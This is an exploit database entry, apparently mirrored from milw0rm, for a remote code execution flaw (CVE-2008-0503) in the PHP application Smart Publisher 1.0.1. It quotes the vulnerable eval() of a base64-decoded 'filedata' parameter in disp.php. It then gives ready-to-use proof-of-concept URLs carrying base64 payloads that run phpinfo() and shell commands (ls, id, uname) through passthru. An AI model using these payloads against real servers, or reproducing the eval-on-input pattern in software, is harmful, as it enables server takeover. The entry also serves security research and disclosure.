Smart Publisher 1.0.1 - 'filedata' Remote Code Execution
Author: GoLd_M
type: webapps
platform: php
port:
date_added: 2008-01-28
date_updated: 2016-11-14
verified: 1
codes: OSVDB-40780;CVE-2008-0503
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comsmart-publisher-1.0.1.zip
###### ###### ############## ###### ###### ######## ##
#### ## ## ## ## ## ## ## ##
######## ## ## ## ######## ## #### ###### ## ## ######## ## ######
## ## ## ## ## ## ## ## #### ## ## ## ## ## ##
########## ## ## ## ########## ## ## ## ########## ## ###### ##
## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## #### ## ## ### ## ## ## ## ## ## ## ##
######### ###### #### ######### ### ###### ########## ###### ########## ###### ##########
######################################################################
### Smart Publisher 1.0.1 (disp.php) Remote Code Execution Exploit ###
### Script : http://sourceforge.net/projects/smart-publisher/ ###
### Vuln Code In '/admin/op/disp.php'In Line '3' ###
### eval("\$v=".base64_decode($filedata).";"); <- Vuln ###
### POC : ###
### /admin/op/disp.php?filedata=cGhwaW5mbygp <= phpinfo() Base64 ###
### ?filedata=cGFzc3RoZXUobHMgLWxpYTtpZDt1bmFtZSAtYSk <= passtheu(ls -lia;id;uname -a)
######################################################################
# milw0rm.com [2008-01-29]